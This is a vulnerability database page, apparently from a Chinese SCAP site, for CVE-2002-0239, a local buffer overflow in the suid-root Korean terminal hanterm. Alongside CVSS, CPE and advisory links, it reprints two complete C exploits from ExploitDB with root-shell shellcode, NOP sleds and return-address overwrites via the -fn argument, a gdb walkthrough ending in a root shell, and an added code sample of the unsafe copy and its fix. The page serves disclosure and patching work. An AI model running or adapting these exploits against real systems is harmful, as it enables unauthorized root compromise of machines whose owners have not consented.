CVE-2002-0239
CVSS 7.2
Published: 2002-05-29 00:00:00
Revised: 2016-10-17 22:17:27
NMCOES

[Original] Buffer overflow in hanterm 3.3.1 and earlier allows local users to execute arbitrary code via a long string in the (1) -fn, (2) -hfb, or (3) -hfn argument.


[CNNVD] Hanterm local buffer overflow vulnerability (CNNVD-200205-073)

        Hanterm 3.3.1 and earlier contain a buffer overflow vulnerability. A local user can execute arbitrary code via an over-long string in the (1) -fn, (2) -hfb, or (3) -hfn argument.

- CVSS (base score)

CVSS score: 7.2 [HIGH]
Confidentiality impact: COMPLETE [complete information disclosure; all system files exposed]
Integrity impact: COMPLETE [system integrity can be fully compromised]
Availability impact: COMPLETE [may take the system down entirely]
Attack complexity: LOW [no access restrictions on exploitation]
Attack vector: LOCAL [exploitation requires physical access or a local account]
Authentication: NONE [no authentication required]

- CPE (affected platforms and products)

cpe:/a:hanterm:hanterm:3.3
cpe:/a:hanterm:hanterm:3.3.1

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0239
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-0239
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200205-073
(official data source) CNNVD

- Other links and resources

ftp://ftp.freebsd.org/pub/FreeBSD/CERT/advisories/FreeBSD-SA-01:41.hanterm.asc
(UNKNOWN)  FREEBSD  FreeBSD-SA-01:41
http://marc.info/?l=bugtraq&m=101310874106455&w=2
(UNKNOWN)  BUGTRAQ  20020207 Overflow Vulnerabilities in hanterm
http://online.securityfocus.com/archive/1/255168
(UNKNOWN)  BUGTRAQ  20020207 another hanterm exploit
http://securitytracker.com/id?1001950
(UNKNOWN)  SECTRACK  1001950
http://www.debian.org/security/2002/dsa-112
(VENDOR_ADVISORY)  DEBIAN  DSA-112
http://www.iss.net/security_center/static/8109.php
(VENDOR_ADVISORY)  XF  hanterm-command-line-bo(8109)
http://www.securityfocus.com/bid/4050
(UNKNOWN)  BID  4050

- Vulnerability information

Hanterm local buffer overflow vulnerability
High severity  Buffer overflow
2002-05-29 00:00:00 2005-10-20 00:00:00
Local
        Hanterm 3.3.1 and earlier contain a buffer overflow vulnerability. A local user can execute arbitrary code via an over-long string in the (1) -fn, (2) -hfb, or (3) -hfn argument.

- Advisories and patches

        Fixes available:
        Hanterm Hanterm 3.3.1

- Vulnerability information (21280)

Hanterm 3.3 Local Buffer Overflow Vulnerability (1) (EDBID:21280)
linux local
2002-02-07 Verified
0 Xpl017Elz
N/A
source: http://www.securityfocus.com/bid/4050/info

Hanterm is a replacement for xterm which includes Hangul support, used for Korean language systems.

A buffer overflow error exists in hanterm. If it is called locally with a maliciously constructed parameter, it is possible to overflow a buffer. This can result in the return address of a stack frame being overwritten, and lead to the execution of arbitrary code.

As hanterm runs suid root on some systems, exploitation of this vulnerability may result in a local root compromise. 

/*
**
** How to exploit?
**
** [x82@xpl017elz x82]$ cp /usr/X11R6/bin/hanterm .
** [x82@xpl017elz x82]$ gdb -q hanterm
** (no debugging symbols found)...(gdb) r -display 61.xx.177.27:0 -fn `perl -e
** 'print "x"x80'`
**  
** Starting program: /home/noname/hanterm -display 61.xx.177.27:0 -fn `perl -e
** 'print "x"x80'`
** (no debugging symbols found)...(no debugging symbols found)...
** (no debugging symbols found)...(no debugging symbols found)...
** (no debugging symbols found)...(no debugging symbols found)...
** (no debugging symbols found)...
** Program received signal SIGSEGV, Segmentation fault.
** 0x80520e6 in strcpy () at ../sysdeps/generic/strcpy.c:30
** 30      ../sysdeps/generic/strcpy.c: 그런 파일이나 디렉토리가 없음.
** (gdb) info reg $esp
** esp            0xbfffe6b8       -1073748296
** (gdb) x/80 0xbffffb00
** 0xbffffb00:     0x65746e61      0x2d006d72      0x70736964      0x0079616c
** 0xbffffb10:     0x332e3136      0x37312e37      0x37322e37      0x2d00303a
** 0xbffffb20:     0x78006e66      0x78787878      0x78787878      0x78787878
** 0xbffffb30:     0x78787878      0x78787878      0x78787878      0x78787878
** 0xbffffb40:     0x78787878      0x78787878      0x78787878      0x78787878
** 0xbffffb50:     0x78787878      0x78787878      0x78787878      0x78787878
** 0xbffffb60:     0x78787878      0x78787878      0x78787878      0x78787878
** 0xbffffb70:     0x00787878      0x5353454c      0x4e45504f      0x656c7c3d
**     ...             ...            ...              ...             ...
** 0xbffffc10:     0x2d2a2d36      0x3563736b      0x2e313036      0x37383931
** 0xbffffc20:     0x2d2c302d      0x6f6b2d2a      0x2d676964      0x6964656d
** 0xbffffc30:     0x722d6d75      0x726f6e2d      0x2d6c616d      0x2d38312d
** (gdb)
** 
** Buffer Structure
**
** [ data addr: 80byte ] + [ ebp addr: 4byte ] + [ ret addr: 4byte ] = 88byte
**
** The return until the address the whole it contains and,
** it puts in an option. 
**
** [x82@xpl017elz x82]$ ./exploit
** 
** XFree86 Version 3.x.x ~ 4.x.x /usr/X11R6/bin/hanterm exploit
** Default: [ data addr ] + [ ebp addr ] + [ ret addr ] = 88byte
** 
**                         Exploit made by Xpl017Elz
** 
** Display HOST_IP: 255.255.255.255:0
** Jumping Address: 0xbffffb74
** 
** Segmentation fault
** [x82@xpl017elz x82]$  
**
** It calculates the offset. 
** Namely, when 0xbffffb20 from 0xbffffb70 until it catches in between, 
** it will be suitable.
**
** [x82@xpl017elz x82]$ ./exploit -a 61.xx.177.27:0 -o 2370 -b 88
** 
** XFree86 Version 3.x.x ~ 4.x.x /usr/X11R6/bin/hanterm exploit
** Default: [ data addr ] + [ ebp addr ] + [ ret addr ] = 88byte
** 
**                         Exploit made by Xpl017Elz
** 
** Display HOST_IP: 61.xx.177.27:0
** Jumping Address: 0xbffffb26
** 
** bash#        
**
** Ooops! it's rootshell :-)
**
** exploit by "you dong-hun"(Xpl017Elz), <szoahc@hotmail.com>. 
** My World: http://x82.i21c.net
**
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>    /* strcpy() */
#include <strings.h>   /* bzero() */
#include <unistd.h>    /* getopt(), optarg, execl() */

#define NOP 0x90
#define DFOFS 2400
#define DFIP "255.255.255.255:0"
#define DFBUF 88

/*
** [ data addr: 80byte ] + [ ebp addr: 4byte ] + [ ret addr: 4byte ] = 88byte
*/

char shellcode[] = /* 53byte shellcode */
"\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80" /* setreuid(0,0); */
"\xeb\x1d\x5e\x89\x76\x08\x31\xc0\x88\x46"
"\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e"
"\x08\x31\xd2\xcd\x80\xb0\x01\x31\xdb\xcd"
"\x80\xe8\xde\xff\xff\xff/bin/sh";

void usages(char *var);
void banrl(void);

/* current stack pointer (i386 only: the value is left in %eax) */
unsigned long sp(void) {
__asm__("movl %esp,%eax");
}

int main(int argc, char *argv[]) {

int rufp, fpru, jobst,
    ferbuf, num=DFBUF,
    ofs=DFOFS;

long addr;

char buffer[2000],
     hoip[] = DFIP;

banrl();

while ((jobst = getopt(argc, argv, "a:o:b:")) != EOF)
switch (jobst) {
case 'a': strcpy(hoip, optarg);
break;
case 'o': ofs = atoi(optarg);
break;
case 'b': num = atoi(optarg);
break;
case '?': usages(argv[0]);
exit(0);
}

printf(" Display HOST_IP: %s\n",hoip);
addr = sp() +ofs; // -ofs;
printf(" Jumping Address: %p\n\n",(void *)addr);
ferbuf = num - sizeof(shellcode) -4; /* bytes left for the NOP sled */

bzero(buffer,2000);
/* NOP sled, then the shellcode, then the guessed return address (little endian) */
for(rufp=0; rufp<=ferbuf; rufp++) {
buffer[rufp] = NOP;
}

for(fpru=0; fpru<=52; fpru++) {
buffer[rufp++] = shellcode[fpru];
}
buffer[rufp++] =     addr & 0xff;
buffer[rufp++] = addr>> 8 & 0xff;
buffer[rufp++] = addr>>16 & 0xff;
buffer[rufp++] = addr>>24 & 0xff;

execl("/usr/X11R6/bin/hanterm", "hanterm",
"-display", hoip, "-fn", buffer, NULL);

exit(0);

}

void usages(char *var) {

printf("\n Usage:\n %s -a [host_ip:0] -o [offset] -b [buffer size] (data addr~ return addr)\n",var);
printf(" Default: %s -a 61.xx.177.27:0 -o 2400 -b 88\n\n",var);

}

void banrl(void) {

printf("\n XFree86 Version 3.x.x ~ 4.x.x /usr/X11R6/bin/hanterm exploit\n");
printf(" Default: [ data addr ] + [ ebp addr ] + [ ret addr ] = 88byte\n\n");
printf("\t\t\t Exploit made by Xpl017Elz\n\n");

}


- Vulnerability information (21281)

Hanterm 3.3 Local Buffer Overflow Vulnerability (2) (EDBID:21281)
linux local
2002-02-07 Verified
0 xperc
N/A
source: http://www.securityfocus.com/bid/4050/info

Hanterm is a replacement for xterm which includes Hangul support, used for Korean language systems.

A buffer overflow error exists in hanterm. If it is called locally with a maliciously constructed parameter, it is possible to overflow a buffer. This can result in the return address of a stack frame being overwritten, and lead to the execution of arbitrary code.

As hanterm runs suid root on some systems, exploitation of this vulnerability may result in a local root compromise.

/* hanterm_exp.c
 *
 * local exploit for hanterm
 *  .. tested in TurboLinux Server 6.5 (Japan)
 *
 * thanks my Japanese friend kaju(kaijyu)
 * and Japanese hacker UNYUN.
 *
 *                  by xperc@hotmail.com
 *                         2002/02/07
 */

#include <stdio.h>
#include <string.h>   /* memset(), strncpy(), strlen() */
#include <unistd.h>   /* execl() */

#define NOP		0x90
#define MAXBUF		88
#define RETOFS		84
#define SHELL_OFS 	22
#define ESP_OFS 	-0xe38

/* current stack pointer (i386 only: the value is left in %eax) */
unsigned int get_esp()
{
	__asm__("mov %esp,%eax");
}

int main()
{
	/* setuid(0); setgid(0); execve("/bin/sh") */
	static char shellcode[]={
		0x31,0xc0,0x31,0xdb,0xb0,0x17,0xcd,0x80,
		0x31,0xc0,0x31,0xdb,0xb0,0x2e,0xcd,0x80,
		0xeb,0x18,0x5e,0x89,0x76,0x08,0x31,0xc0,
		0x88,0x46,0x07,0x89,0x46,0x0c,0xb0,0x0b,
		0x89,0xf3,0x8d,0x4e,0x08,0x8d,0x56,0x0c,
		0xcd,0x80,0xe8,0xe3,0xff,0xff,0xff,0x2f,
		0x62,0x69,0x6e,0x2f,0x73,0x68,0x00
	};
	unsigned int retadr;
	char buf[MAXBUF];
	int i;

	memset(buf,NOP,MAXBUF);		/* NOP sled first */

	retadr=get_esp()+ESP_OFS;
	printf("Jumping address = %p\n",(void *)retadr);

	/* spray the guessed return address around RETOFS; the loop also runs
	   past the end of buf, so the unterminated argument carries extra copies */
	for(i=RETOFS-32;i<RETOFS+32;i+=4){
		buf[i]	=retadr&0xff;
		buf[i+1]=(retadr>>8)&0xff;
		buf[i+2]=(retadr>>16)&0xff;
		buf[i+3]=(retadr>>24)&0xff;
	}
	/* shellcode goes over the front of the sprayed area */
	strncpy(buf+SHELL_OFS,shellcode,strlen(shellcode));
	//buf[MAXBUF-1]='\0';       faint!:-(
	execl("/usr/bin/X11/hanterm","hanterm","-fn",buf,(char *)0);
	return 1;	/* execl() only returns on failure */
}


- Vulnerability information

14336
hanterm Multiple Command Parameter Local Overflow
Local Access Required Input Manipulation
Loss of Integrity Third-Party Solution
Exploit Public Third-party Verified

- Vulnerability description

- Timeline

2002-02-07 Unknown
2002-02-07 Unknown

- Solution

Products

Unknown or Incomplete

- References

- Vulnerability author

Unknown or Incomplete

- Vulnerability information

Hanterm Local Buffer Overflow Vulnerability
Boundary Condition Error 4050
No Yes
2002-02-07 12:00:00 2009-07-11 10:56:00
Discovered by xperc <xperc@hotmail.com>.

- Affected program versions

Hanterm Hanterm 3.3.1
- Debian Linux 2.2 sparc
- Debian Linux 2.2 powerpc
- Debian Linux 2.2 IA-32
- Debian Linux 2.2 arm
- Debian Linux 2.2 alpha
- Debian Linux 2.2 68k
Hanterm Hanterm 3.3
+ Turbolinux Turbolinux 7.0
+ Turbolinux Turbolinux 6.5

- Vulnerability discussion

Hanterm is a replacement for xterm which includes Hangul support, used for Korean language systems.

A buffer overflow error exists in hanterm. If it is called locally with a maliciously constructed parameter, it is possible to overflow a buffer. This can result in the return address of a stack frame being overwritten, and lead to the execution of arbitrary code.

As hanterm runs suid root on some systems, exploitation of this vulnerability may result in a local root compromise.
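As an added illustration (not hanterm source, nor code from either exploit author), the unbounded copy pattern the description above refers to, beside a bounded replacement that rejects over-long -fn, -hfb and -hfn values; the 80-byte buffer size is an assumption taken from the "[ data addr: 80byte ]" layout quoted in the exploit comments.

```c
/* Added illustration, not hanterm's own source: the weak copy pattern behind
 * CVE-2002-0239 beside a bounded replacement. The 80-byte size is assumed
 * from the "[ data addr: 80byte ]" layout quoted in the exploit comments. */
#include <stdio.h>
#include <string.h>

#define OPTBUF 80

/* Weak pattern: strcpy() trusts the length of argv data; a value longer than
 * OPTBUF-1 bytes runs past the buffer into the saved ebp and return address. */
static void copy_option_unchecked(char dst[OPTBUF], const char *src)
{
    strcpy(dst, src);
}

/* Hardened form: refuse anything that will not fit, terminator included.
 * Returns 0 on success, -1 when the value is rejected. */
static int copy_option_checked(char dst[OPTBUF], const char *src)
{
    size_t n = 0;
    while (n < OPTBUF && src[n] != '\0')
        n++;
    if (n >= OPTBUF)
        return -1;              /* too long: reject instead of truncating */
    memcpy(dst, src, n + 1);    /* n < OPTBUF, so the NUL fits as well */
    return 0;
}

/* Scan an argv-style vector for the three affected options and store their
 * values. Returns how many values were rejected as over-long. */
static int parse_font_options(int argc, char *const argv[],
                              char fn[OPTBUF], char hfb[OPTBUF], char hfn[OPTBUF])
{
    int rejected = 0;
    for (int i = 1; i + 1 < argc; i++) {
        char *dst = NULL;
        if (strcmp(argv[i], "-fn") == 0)       dst = fn;
        else if (strcmp(argv[i], "-hfb") == 0) dst = hfb;
        else if (strcmp(argv[i], "-hfn") == 0) dst = hfn;
        if (dst == NULL)
            continue;
        i++;                                    /* consume the option value */
        if (copy_option_checked(dst, argv[i]) != 0) {
            fprintf(stderr, "%s: value too long (max %d bytes)\n",
                    argv[i - 1], OPTBUF - 1);
            rejected++;
        }
    }
    return rejected;
}
```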

- Exploit

An exploit has been provided by xperc <xperc@hotmail.com>:

- Solution

Fixes available:

Hanterm Hanterm 3.3.1

- References

About the SCAP Chinese Community

The SCAP Chinese Community is the first Chinese open community devoted to SCAP. For more information, see [About this site].

Copyright notice

CVE/CWE/OVAL are registered trademarks of the MITRE Corporation; their official data sources are kept on MITRE's websites.